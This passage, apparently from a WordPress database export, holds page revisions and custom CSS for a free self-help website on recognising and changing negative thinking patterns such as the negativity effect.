(i.e. there is nothing to buy, download, register, etc).&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The human mind â€œthinksâ€ in extremely complex ways and in many ways that is what makes all of us amazingly different from each other. The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Unfortunately, over time, oneâ€™s mind may develop certain â€œunhelpfulâ€ ways of thinking that can negatively affect oneâ€™s mental wellbeing.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The aim of this website is to help you to recognise unhelpful ways of thinking when it happens in your mind and to show you practical ways to prevent such thinking from affecting you in a negative way.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":1443} /-->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a style="font-size: 14px;" href="https://www.stopstupidthinking.com/negativity_effect/">Negativity effect thinking</a></p>\n<!-- /wp:paragraph -->', 'How to change unhelpful ways of thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-04-10 10:29:31', '2023-04-10 10:29:31', '', 88, 'https://www.happythinking.com/?p=1534', 0, 'revision', '', 0),
(1535, 1, '2023-04-10 10:30:36', '2023-04-10 10:30:36', '<!-- wp:paragraph -->\n<p>Letâ€™s start by discussing a common type of stupid thinking that oneâ€™s brain may do, which psychologists call the â€œnegativity effectâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In your life, you have positive experiences (e.g. getting a promotion at work) and negative experiences (e.g. losing an expensive phone). Unfortunately, your brain can have the tendency of giving excessive importance to negative experiences while mostly ignoring positive experiences. This increased focus on negative experiences can make you unnecessarily feel that things are worse than they really are. This of course makes no sense as there is no reason that one should just focus on negative experiences. Rather, one should look at both, positive and negative experiences, to get a balanced view.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Psychologists have named this stupid thinking, where oneâ€™s brain exaggerates negative experiences, the â€œnegativity effectâ€. It is quite an important one to be wary of, as if it happens too often, it can lead to one having a low mood or even depression.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"id":565,"sizeSlug":"large","linkDestination":"none","className":"pras_border"} -->\n<figure class="wp-block-image size-large pras_border"><img src="https://www.happythinking.com/wp-content/uploads/2020/11/heavy_negative_061120-1024x576.gif" alt="" class="wp-image-565"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>The example below shows how the negativity effect can be harmful.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"opacity":"css","className":"aligncenter is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity aligncenter is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Joe works in a financial company and was asked to give four important presentations at a company meeting. Joe worked really hard on his presentations and was well prepared.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the day, he gave four excellent presentations. They were well written, delivered clearly and had nice clear diagrams. Each presentation was followed by a question and answer session. During the first three presentations, Joe answered all the questions perfectly. However, at the last presentation, he made a small mistake when answering one of the questions and this made some of the members of the audience laugh. Nevertheless, at the end of the day, everyone applauded Joe for his truly excellent presentations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Despite the presentations going well, when Joe returned to his home later that day, he became very depressed. All that he thought about was that one question he had answered wrongly. His brain was ignoring all the positive experiences of the day where he had made excellent presentations and had answered all questions except one, perfectly. That one negative episode overshadowed the otherwise perfect day, making Joe unnecessarily feel depressed. In reality, instead of being depressed, he should have been overjoyed by the overall good performance he had done on the day.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>In your life, to prevent unnecessary distress, it is important to check if your brain is only focusing only on the negative experiences in your life. Try to give importance to both positive and negative experiences in a balanced way, instead of only seeing the negative aspects. You should feel good about the positive experiences and learn from the negative experiences.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.stopstupidthinking.com" style="border-radius:15px">Home</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.stopstupidthinking.com/spotlight_effect/" style="border-radius:15px">Click for next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-04-10 10:30:36', '2023-04-10 10:30:36', '', 1034, 'https://www.happythinking.com/?p=1535', 0, 'revision', '', 0),
(1538, 1, '2023-04-10 10:33:22', '2023-04-10 10:33:22', '<!-- wp:columns {"align":"full"} -->\n<div class="wp-block-columns alignfull"><!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"50%"} -->\n<div class="wp-block-column" style="flex-basis:50%"><!-- wp:image {"id":1251,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image size-full"><img src="https://www.happythinking.com/wp-content/uploads/2021/08/home_stupid300821.gif" alt="" class="wp-image-1251"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy and it is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc).&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The human mind â€œthinksâ€ in extremely complex ways and in many ways that is what makes all of us amazingly different from each other. The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Unfortunately, over time, oneâ€™s mind may develop certain â€œunhelpfulâ€ ways of thinking that can negatively affect oneâ€™s mental wellbeing.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The aim of this website is to help you to recognise unhelpful ways of thinking when it happens in your mind and to show you practical ways to prevent such thinking from affecting you in a negative way.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/introduction/">Introduction</a></p>\n<!-- /wp:paragraph -->', 'How to change unhelpful ways of thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-04-10 10:33:22', '2023-04-10 10:33:22', '', 88, 'https://www.happythinking.com/?p=1538', 0, 'revision', '', 0),
(1536, 1, '2023-04-10 10:31:40', '2023-04-10 10:31:40', '<!-- wp:columns {"align":"full"} -->\n<div class="wp-block-columns alignfull"><!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"50%"} -->\n<div class="wp-block-column" style="flex-basis:50%"><!-- wp:image {"id":1251,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image size-full"><img src="https://www.happythinking.com/wp-content/uploads/2021/08/home_stupid300821.gif" alt="" class="wp-image-1251"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy and it is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc).&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The human mind â€œthinksâ€ in extremely complex ways and in many ways that is what makes all of us amazingly different from each other. The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Unfortunately, over time, oneâ€™s mind may develop certain â€œunhelpfulâ€ ways of thinking that can negatively affect oneâ€™s mental wellbeing.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The aim of this website is to help you to recognise unhelpful ways of thinking when it happens in your mind and to show you practical ways to prevent such thinking from affecting you in a negative way.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a style="font-size: 14px;" href="https://www.stopstupidthinking.com/negativity_effect/">Negativity effect thinking</a></p>\n<!-- /wp:paragraph -->', 'How to change unhelpful ways of thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-04-10 10:31:40', '2023-04-10 10:31:40', '', 88, 'https://www.happythinking.com/?p=1536', 0, 'revision', '', 0),
(1326, 2, '2020-08-17 05:22:51', '2020-08-17 05:22:51', 'a:link { color: blue; }  \na:visited { color: purple; }  \na:hover { color: red; }  \na:active { color: yellow; }', 'Divi', '', 'publish', 'closed', 'closed', '', 'divi', '', '', '2020-08-17 05:22:51', '2020-08-17 05:22:51', '', 0, 'https://www.stopstupidthinking.com/divi/', 0, 'custom_css', '', 0),
(1158, 2, '2021-04-28 17:11:17', '2021-04-28 17:11:17', '/* unvisited link blue */\na:link {\n  color: #0000FF;\n}\n\n/* visited link brown*/\na:visited {\n  color: #A52A2A;\n}\n\n/* mouse over link */\na:hover {\n  color: red;\n}\n\n/* selected link */\na:active {\n  color: yellow;\n}\n\n/*\nAdd border around images\n*/\n.pras_border img {\nborder-style:solid;\nborder-width:1px;\nborder-color:#000000;\n}', 'astra-child', '', 'publish', 'closed', 'closed', '', 'astra-child', '', '', '2021-04-28 17:11:17', '2021-04-28 17:11:17', '', 0, 'https://www.stopstupidthinking.com/astra-child/', 0, 'custom_css', '', 0),
(1541, 1, '2023-04-10 10:35:51', '2023-04-10 10:35:51', '<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">HOME</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->', 'home', '', 'inherit', 'closed', 'closed', '', '1297-revision-v1', '', '', '2023-04-10 10:35:51', '2023-04-10 10:35:51', '', 1297, 'https://www.happythinking.com/?p=1541', 0, 'revision', '', 0),
(1869, 1, '2023-06-17 08:23:41', '2023-06-17 08:23:41', '<!-- wp:paragraph -->\n<p>First of all, welcome to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me a happier person and I am very pleased to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We all desire to be happy. Unfortunately, the world we live in is full of stress and challenges, and a lot of these we are not able to get rid of, at least in the short term. In other words, we need to be able to be as happy as we can, despite the various challenges around us.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>While we may not be able to always control the things happening around us, one thing we can control is how our minds â€œthinkâ€. Happiness is created by thoughts, so thinking in positive and useful ways can promote happiness in us. On the other hand, thinking in negative and useless ways can push us into unhappiness. The â€œway we thinkâ€ is an immensely powerful determinant of our happiness.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this personâ€™s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1842,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/drowning_160623.jpg" alt="" class="wp-image-1842"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>â€œHappy Thinkingâ€ is about changing oneâ€™s negative thinking so that one can, despite the challenges around oneself, be in a state of happiness. To help one to achieve this in a logical manner, I have divided this website about Happy Thinking into two main parts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe, in an easy-to-understand way, common negative thinking that people do. This will help one to recognise such thinking when it happens in oneâ€™s mind. An important aspect of changing negative thinking is to be able to recognise such thinking. After all, how can one change something that one does not see? For this reason, the first part of the website will purely focus on describing negative thinking, without explaining how you can change such thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various mental techniques that oneâ€™s mind can use to change negative thinking. I like to think of such mental techniques as â€œtoolsâ€, and just like a repairman will use various tools to repair something, one will be able to use these tools to change oneâ€™s negative thinking. These â€œtoolsâ€ are very practical so that one will be able to use them in oneâ€™s daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving tools to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make one into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1868,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/happycauldron170623.jpg" alt="" class="wp-image-1868"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-17 08:23:41', '2023-06-17 08:23:41', '', 1034, 'https://www.happythinking.com/?p=1869', 0, 'revision', '', 0),
(88, 1, '2020-08-17 05:29:01', '2020-08-17 05:29:01', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":2059,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking080723.jpg" alt="" class="wp-image-2059"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:spacer {"height":"25px"} -->\n<div style="height:25px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This free website will share with you the concept of â€œHappy Thinkingâ€ which can help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. According to psychologists, over time, oneâ€™s mind may develop certain ways of thinking that are not helpful to oneâ€™s mental well-being. Such unhelpful ways of thinking are very common and one may not even realise that one is thinking in such ways.  To achieve happiness in one''s life, it is important to recognise and change unhelpful ways of thinking.  The concept of Happy Thinking can help you and it''s about:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {"ordered":true} -->\n<ol><!-- wp:list-item -->\n<li>Recognising unhelpful ways of thinking</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Changing unhelpful thinking</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Learning from wisdom about happiness</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>In this free website, I will describe common types of unhelpful thinking that people do. This will help you to recognise when you think in such ways. I will also share with you practical ways that you can deal with unhelpful ways of thinking. Additionally, I will sprinkle bits of wisdom about happiness that I have collected from various sources. This will help you to see the world in a more realistic way. These ingredients together make up the concept of Happy Thinking, which can help you become happier.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website on Happy Thinking is truly free. There is nothing to buy, download, register or any other sales tactics. All I wish is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing how you think', '', 'publish', 'closed', 'closed', '', 'home', '', '', '2024-01-12 22:26:12', '2024-01-12 22:26:12', '', 0, 'https://www.stopstupidthinking.com/?page_id=88', 0, 'page', '', 0),
(1924, 1, '2023-06-21 10:41:42', '2023-06-21 10:41:42', '<!-- wp:image {"align":"center","id":1922,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking_210623.jpg" alt="" class="wp-image-1922"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind.&nbsp; While recognising negative thinking is important, you also need ways of dealing with such thinking. For this, I will share with you various mental techniques (â€œmental toolsâ€) that will help you to change negative thinking into more positive ways of thinking. These mental tools will be very practical so that you can use them in your day to day life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Change negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-21 10:41:42', '2023-06-21 10:41:42', '', 88, 'https://www.happythinking.com/?p=1924', 0, 'revision', '', 0),
(1533, 1, '2023-04-10 10:26:40', '2023-04-10 10:26:40', '<!-- wp:columns {"align":"full"} -->\n<div class="wp-block-columns alignfull"><!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"50%"} -->\n<div class="wp-block-column" style="flex-basis:50%"><!-- wp:image {"id":1251,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image size-full"><img src="https://www.happythinking.com/wp-content/uploads/2021/08/home_stupid300821.gif" alt="" class="wp-image-1251"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>Most of us assume that our brains â€œthinkâ€ in a sensible and logical way. However, in reality, psychologists have found that the human brain has a tendency to think in certain illogical ways which can make one make wrong judgments and decisions in oneâ€™s daily life. Such â€œstupid thinkingâ€ is extremely common and it happens to everyone, though most of us would not even realise that we are thinking in these ways.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This completely free website explains, in a very easy to understand way, common types of stupid thinking that oneâ€™s brain may do. This will help you to recognise and correct such thinking when it happens in your own brain.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is completely free to access so that everyone can benefit.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click on the button below to start reading.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":1443} /-->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a style="font-size: 14px;" href="https://www.stopstupidthinking.com/negativity_effect/">Negativity effect thinking</a></p>\n<!-- /wp:paragraph -->', 'How to change unhelpful ways of thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-04-10 10:26:40', '2023-04-10 10:26:40', '', 88, 'https://www.happythinking.com/?p=1533', 0, 'revision', '', 0),
(1613, 1, '2023-05-30 17:25:02', '2023-05-30 17:25:02', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were â€œhelpfulâ€ as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was â€œunhelpfulâ€ and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise unhelpful thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. I have divided this website about Happy Thinking into two main parts:</p>\n<!-- /wp:paragraph -->\n\n<!-- 